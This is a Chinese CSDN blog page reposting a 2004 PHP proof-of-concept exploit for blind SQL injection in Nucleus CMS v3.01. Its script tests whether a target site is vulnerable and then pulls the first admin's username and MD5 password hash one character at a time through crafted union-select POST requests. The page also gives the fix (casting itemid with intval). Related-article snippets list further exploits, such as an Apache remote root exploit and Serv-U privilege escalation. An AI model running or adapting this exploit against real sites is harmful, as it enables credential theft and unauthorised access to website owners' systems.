最新sql溢出源代码(概念版)

最新推荐文章于 2004-11-30 00:57:00 发布
最新推荐文章于 2004-11-30 00:57:00 发布
阅读量1.4k 收藏
点赞数
分类专栏: 源代码文档 文章标签: sql function cms debian header user
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/superhacker110/article/details/169730
版权

最新sql溢出源代码(概念版)


#!/usr/bin/php

<?


// Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept
// By aCiDBiTS           acidbits@hotmail.com           24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
//
// This Proof of Concept dumps the username and MD5(password) of the admin
user placed at first position
// of members table. First of all checks if we can use "union select" or it
isn't patched and then if first
// member is admin.
//
// Usage (in my debian box):
// php4 -q nuc_addc_poc.php URL


// Vulnerability description
//
// In action.php, function addcoment, there's no user input sanization for
parameter itemid. In line 65:
// $blogid = getBlogIDFromItemID($post['itemid']);
// This allows to inject SQL to get data form the database.
//
// Solution
//
// Modify line 65 with:
// $blogid = getBlogIDFromItemID(intval($post['itemid']));

 

     
echo
"+-------------------------------------------------------------------+/n|
Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |/n| By
aCiDBiTS           acidbits@hotmail.com           24-July-2004
|/n+-------------------------------------------------------------------+/n/n
";

if($argc<2) die("Usage: ".$argv[0]." URL/n/n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "Checking if vulnerable and /"union select/" works ... ";
if( test_cond("1") && !test_cond("0") )  echo "OK!/n";
else die( "It doesn't :-(/n/n" );

echo "Checking if first member of table is admin ... ";
if( test_cond("1") )  echo "OK!/n";
else die( "It's not :-(/n/n" );

echo "/nGetting username: ";
get_field("mname");
echo "/nGetting MD5(password): ";
get_field("mpassword");

die("/n/nDone!/n/n");


function get_field( $field )
{
 $unval= "
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
 $idx=1;
 $min=0;
 $max=strlen($unval);
 while($min!=$max) {
  $mid=$min+(($max-$min)/2);
  if(
test_cond("ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1))) ) {
   $idx++;
   echo substr($unval,$mid,1);
   $min=0;
   $max=strlen($unval);
   if( !test_cond("ord(substring($field,$idx,1))") )
return;
  } else {
   if(
test_cond("ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1))) )
$max=$mid;
   else $min=$mid;
  }
 }
 die( "/n/nUnexpected error!/n/n");
}


function test_cond( $cond )
{
 
$res=send_post("action=addcomment&url=index.php%3Fitemid%3D1&itemid=1+and+0+
union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+".urlencod
e($cond)."&body=a&user=a&userid=");
    if( eregi( "nucleus_ban", $res ) )
  return 0;
 else return 1;
}

function send_post($data)
{
 global $host;
 $ch=curl_init();
 curl_setopt ($ch, CURLOPT_URL, $host."action.php" );
 curl_setopt ($ch, CURLOPT_HEADER, 0);
 curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
 curl_setopt ($ch, CURLOPT_POST, 1);
 curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
 $data=curl_exec ($ch);
 curl_close ($ch);

 return $data;
}

?>

superhacker110
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
最新sql溢出源代码概念).rar_溢出
09-14
在这个"最新sql溢出源代码概念).rar_溢出"的压缩包中,包含了可能用于理解和研究SQL溢出攻击的源代码,以及可能的解释文档。 源代码通常是程序员用以实现特定功能的指令集合,这里的"最新sql溢出源代码概念...
小小黑客之路代码(无毒)
03-10
"无毒"再次强调了这个资源的安全性,而"源代码"或"code"则意味着用户将有机会接触到实际的编程代码,而不是仅仅理论知识,这对于提升实践技能至关重要。 在【压缩包子文件的文件名称列表】中,我们看到只有一个...
五种可遇不可求的源代码
10-08
包括:apache exploit,ie exploit,win 2000 xp task scheduler exploit, 以及生成 linux x86的 shellcode和最新sql溢出源代码概念), 这些都是由一位在澳大利亚留学的朋友冷血*无情从国外网站上收集的。
java深度复制源代码
01-22
### Java深度复制源代码知识点解析 #### 一、深度复制概念 在Java中,对象的复制分为浅复制和深度复制两种。浅复制是指创建一个新的对象,并将原对象的非引用类型的字段值复制到新对象中;对于引用类型的字段,只是...
Chct.rar_ICQ弱点检测代码
09-23
这意味着其中可能包含了源代码、脚本或工具,这些都可以用来扫描ICQ客户端或服务器端的潜在安全问题,如未授权访问、缓冲区溢出SQL注入等常见的软件漏洞。 根据压缩包子文件的文件名称列表,我们可以推测这些文件...
手把手教你玩转ARP包(一)【数据包的游戏系列之一】
11-30 1835
手把手教你玩转ARP包(一)【数据包的游戏系列之一】 前   言          首先要感谢网络安全资深专家卢湖川博士以及VC网络的limin朋友提供的资料以及帮助^_^经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,所以就想写一系列的文章来详细深入的探讨关于数据包的知识,,我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我
手把手教你玩转ARP包(完)【数据包的游戏系列之一】
11-30 1740
手把手教你玩转ARP包(完)【数据包的游戏系列之一】 作者:   CSDN  VC/MFC 网络编程 PiggyXP  ^_^ 本篇目录:     四。ARP包的游戏      1 .   小伎俩      2.    ARP欺骗的实现      3.   基于ARP欺骗的监听原理  四.ARP包的游戏既然我们可以自己来填充数据包,那
IP地址精解
11-30 1680
IP地址精解 [网络基础知识]==-IP地址精解-== 为什麽我们要学二进位哎呀还不是该死的蠢电脑嘛它只懂得0和1那麽我们要和电脑沟通的时候也只好装蠢一些才行。当电脑要处理IP运算的时候最终是以二进位的形式进行的。 我们人类最习惯的运算规则是十进位也就是从0到9为一圈回到零的时候就进一位数而我们前面讨论的bit和byte则是八进位即0到7为一圈回到零就进一位数另外还有十六进位由0到15为一
网卡MAC地址相关信息大全(整理)(上)
11-30 1570
网卡MAC地址相关信息大全(整理)(上) 首先要感谢jzyhummel(刀锋[篱影]) 兄弟提供的部分资料^_^    网卡地址这个概念有点混淆不清。因为实际上有两个地址,mac地址和物理地址,一般说网卡地址我是指物理地址,不知道别人怎么看?物理地址指的是网卡上的存放地址的ROM里的地址,mac地址是这块卡工作的时候用的地址,一般情况下这两个地址是一样的,所以很多人都混用了,甚至不知道
手把手教你玩转ARP包(三)【数据包的游戏系列之一】
11-30 1481
手把手教你玩转ARP包(三)【数据包的游戏系列之一】 作者:CSDN  VC/MFC 网络编程 PiggyXP  ^_^   目录: 二。发送数据包的编程实现   1.  填充数据包   2.  发送数据包三。一些附加步骤及说明   1.  如果在VC中使用winpcap   2.  获得网卡信息列表   3.  获得系统ARP信息列表   
创建SvcHost.exe调用的服务原理与实践
11-30 1449
创建SvcHost.exe调用的服务原理与实践 1. 多个服务共享一个Svchost.exe进程利与弊       windows 系统服务分为独立进程和共享进程两种,在windows NT时只有服务器管理器SCM(Services.exe)有多个共享服务,随着系统内置服务的增加,在windows 2000中ms又把很多服务做成共享方式,由svchost.exe启动。windows 2000一般有
Serv-u Ftp Server 本地权限提升漏洞的终极防御
11-27 1244
  Serv-u Ftp server(以下简称Serv-u)是一个应用比较广泛的Ftp Server,功能强大,使用方便,Serv-u>3.x本存在本地权限提升漏洞,使用guest权限结合Exp可以以system权限运行程序,通过Webshell结合Exp提升权限已经成了很常用提升方法。漏洞简介:    漏洞是使用Serv-u本地默认管理端口,以默认管理员登陆新建域和用户来执行命令,Ser
手把手教你捕获数据包(上)【数据包的游戏系列之二】
11-30 1138
手把手教你捕获数据包(上)【数据包的游戏系列之二】 前   言      经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,也写过很多的sniffer,所以就想写一系列的文章来详细深入的探讨关于数据包的知识。我希望通过这一系列的文章,能使得关于数据包的知识得以普及,所以这系列的每一篇文章我都会有由浅入深的解释、详细的分析、以及编码步骤,另外附上带有详细注释的源码
Serv-U ftp server 密码算法
11-27 1097
测试环境:SERV-U 4.1 & 5.0 & 5.004测试结果:测试通过测试方法:输入明文后点提交,而后将下面文本框中的散列复制下来,粘贴到Serv-U的ServUDaemon.ini文件中,而后重新启动Serv-u服务。即可测试密码是否正确。测试时发现,直接在INI文件中添加的账户,无须启动SERV-U即可登陆,但如果你同时添加了一些虚拟目录的话,虚拟目录需要服务器重起时才能生效。另外,如果
SERV-U本地溢出源代码
11-24 992
RhinoSoft Serv-U 5.1.0.0RhinoSoft Serv-U 5.0.0.9RhinoSoft Serv-U 5.0.0.4RhinoSoft Serv-U 5.0RhinoSoft Serv-U 4.1.0.3RhinoSoft Serv-U 4.1.0.11RhinoSoft Serv-U 4.0.0.4RhinoSoft Serv-U 4.0.0.0RhinoSoft
手把手教你捕获数据包(下)【数据包的游戏系列之二】
11-30 972
B. 打开相应网卡并设置为混杂模式:   在此之前肯定要有一段让用户选择网卡、并获得用户选择的网卡的名字的代码,既然上面已经可以获得所有网卡的名字了,这段代码就暂且略过了。   我们主要是要用到 pcap_open_live 函数,不过这个函数winpcap的开发小组已经建议用pcap_open 函数来代替,不过因为我的代码里面用的就是pcap_open_live,所以也不便于修改了,不过
手把手教你玩转ARP包(二)【数据包的游戏系列之一】
11-30 954
 作者:   CSDN  VC/MFC 网络编程 PiggyXP  ^_^   目录:     一.    关于ARP协议的基础知识     3. ARP包的填充二。发送数据包的编程实现   1.填充数据包 .........................紧接上文............................ 3.ARP包的填充1) 请求
Apache/1.3.29 - Remote Root Exploit
11-24 934
Apache/1.3.29 - Remote Root Exploit unsigned char h3llc0de[]={ 0x23, 0x21, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x70, 0x65, 0x72, 0x6c, 0x0a, 0x0a, 0x24, 0x63, 0x68, 0x61, 0x6e, 0x3d,
基于oracle的sql优化源代码
最新发布
06-30
### 回答1: SQL优化是通过改进查询语句的性能来提高数据库系统的查询效率。基于Oracle数据库的SQL优化源代码主要包括以下几个方面的内容: 1. 查询语句的编写与优化:合理编写SQL查询语句,避免使用不必要的表连接、子查询等复杂操作,使用WHERE子句过滤数据以减少返回结果集的大小,避免使用通配符查询,尽量使用索引字段进行查询。 2. 索引的优化与使用:根据查询频率与性能需求,为查询字段添加索引,避免全表扫描操作,提高查询速度。对于大表,可以考虑使用分区索引或位图索引来提高查询性能。 3. 数据库统计与分析:通过Oracle的统计信息,对表、索引、列等数据库对象进行分析,确定是否需要重新构建或刷新统计信息,以提供准确的优化器成本估算值,确保SQL查询的性能最佳。 4. 数据库参数调优:根据实际的系统负载情况,调整Oracle数据库的参数配置,包括内存分配、并发连接数、缓冲池大小、日志文件大小等,在不同的应用场景下,调优数据库参数可以提高SQL查询的性能。 5. SQL性能监控:通过Oracle提供的性能监控工具,如AWR报告、ASH报告等,分析SQL语句的执行计划、等待事件、锁等信息,找出性能瓶颈并进行相应的优化。 以上是基于Oracle的SQL优化源代码的主要内容,通过优化查询语句、使用索引、统计分析、数据库参数调优和SQL性能监控等手段,可以提高SQL查询的性能,提升整个数据库系统的效率。 ### 回答2: 优化Oracle的SQL源代码可以通过以下几个步骤实现。首先,可以通过使用合适的索引来优化查询性能。索引可以加快查询速度,减少数据库访问的次数。但是要注意,过多的索引可能会降低数据更新性能,所以需要找到合适的平衡点。 其次,可以通过使用分区表来提高查询性能。分区表将数据按照特定的规则分割成多个分区,可以在查询时只访问特定的分区,提高查询效率。 另外,可以对SQL语句进行优化,比如避免使用不必要的表连接、避免使用子查询等。可以使用EXPLAIN PLAN工具来分析SQL语句的执行计划,从而找出潜在的性能瓶颈,并进行优化。 此外,还可以通过使用合适的并行处理来提高查询的性能。Oracle数据库支持并行执行,可以同时使用多个CPU来处理查询请求,从而加快查询速度。 最后,还可以通过调整Oracle数据库的参数来优化性能。可以根据系统的实际情况,调整SGA和PGA内存大小,优化数据库缓存和排序操作的性能。 总之,基于Oracle的SQL优化源代码主要包括索引优化、分区表优化、SQL语句优化、并行处理和数据库参数调优。通过综合应用以上方法,可以显著提高数据库查询的性能和效率。 ### 回答3: Oracle的SQL性能优化是通过不断优化SQL查询语句和数据库结构来提升查询性能的过程。下面是一个基于Oracle的SQL优化的源代码示例: ```sql -- 创建索引来加快查询性能 CREATE INDEX idx_customer_name ON customer (name); -- 选择适当的数据类型,减小存储空间 ALTER TABLE orders MODIFY (total_cost NUMBER(10, 2)); -- 使用内联视图来提高查询效率 SELECT o.order_id, o.order_date, od.product_name, od.quantity FROM orders o JOIN ( SELECT order_id, product_name, quantity FROM order_details WHERE quantity > 5 ) od ON o.order_id = od.order_id WHERE o.order_date BETWEEN TO_DATE('2022-01-01', 'YYYY-MM-DD') AND TO_DATE('2022-01-31', 'YYYY-MM-DD'); -- 查询结果分页 SELECT * FROM ( SELECT rownum AS rn, customer_id, name, address FROM customer ORDER BY name ) WHERE rn BETWEEN 11 AND 20; -- 使用分区表提高查询性能 CREATE TABLE sales ( sale_id NUMBER, sale_date DATE, product_id NUMBER, quantity NUMBER, amount NUMBER ) PARTITION BY RANGE (sale_date) ( PARTITION sales_q1 VALUES LESS THAN (TO_DATE('2022-04-01', 'YYYY-MM-DD')), PARTITION sales_q2 VALUES LESS THAN (TO_DATE('2022-07-01', 'YYYY-MM-DD')), PARTITION sales_q3 VALUES LESS THAN (TO_DATE('2022-10-01', 'YYYY-MM-DD')), PARTITION sales_q4 VALUES LESS THAN (TO_DATE('2023-01-01', 'YYYY-MM-DD')) ); ``` 以上是一些常用的基于Oracle的SQL优化源代码示例,通过索引创建、数据类型选择、内联视图、分页查询和分区表等方法,可以提高SQL查询的性能和效率。当然,具体优化的方式还需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值